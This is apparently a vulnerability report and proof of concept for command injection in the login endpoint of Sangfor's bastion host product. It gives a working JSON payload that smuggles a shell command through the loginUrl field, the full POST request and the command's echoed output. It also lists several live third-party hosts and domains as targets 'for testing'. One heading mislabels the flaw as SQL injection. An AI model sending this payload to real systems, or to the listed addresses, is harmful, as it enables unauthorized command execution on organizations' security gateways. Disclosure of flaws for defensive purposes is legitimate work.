Title: Command Execute in Sangfor Operation and Maintenance Security Management System (Bastion Host) ≥ 3.0

BUG_Author: Tajang

Affected Version: Sangfor Operation and Maintenance Security Management System (Bastion Host) ≥ 3.0

Vendor: SangFor OSM

Software: SangFor OSM

Vulnerability Files:

• fort/portal_login

Description:

1. Execute commands on the frontend:

   • The vulnerability exists in the system’s fort/portal_login.

2. Exploiting the Command Execution:

   • The login_url in the frontend can execute system commands.

3. Example SQL Injection Payload:

   • The following payload can be used to execute system commands.:

     1"{\"userName\":\"Bob\", \"loginUrl\":\"`id`\", \"role\": \"\",\"password\": \"123456789\"}" #

4. Front-end Command Execution Point:

   • Send a POST request to this URL, with the Content-Type set to JSON format and the body containing the payload above::

     1http://<target-ip>/fort/portal_login

5. Verifying the Exploit:

   • If the command execution is successful, the attacker will see the command echo in the response body of the returned packet.

Proof of Concept:

1. Access the login page of the vulnerable application:

   1https://111.31.77.177:4443/fort/portal_login

2. The complete post packet:

   1POST /fort/portal_login HTTP/1.1
   2Host: 111.31.77.177:4443
   3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
   4Cookie: 
   5Content-Type: application/json; charset=utf-8
   6
   7"{\"userName\":\"Bob\", \"loginUrl\":\"`id`\", \"role\": \"\",\"password\": \"123456789\"}" #

3. If successful, you should see the following content in the response body.

1{
2  "redirectUrl": "uid=1005(webuser) gid=1006(webuser) groups=1006(webuser),65534(nogroup)",
3  "message": "role为空",
4  "isSuccess": false
5}

​ 4.I provided some addresses for testing:

https://blj.dongyuansh.com:4430/fort/portal_login

https://61.171.81.50:44331/fort/portal_login

https://xxb.cqfsk.com/fort/portal_login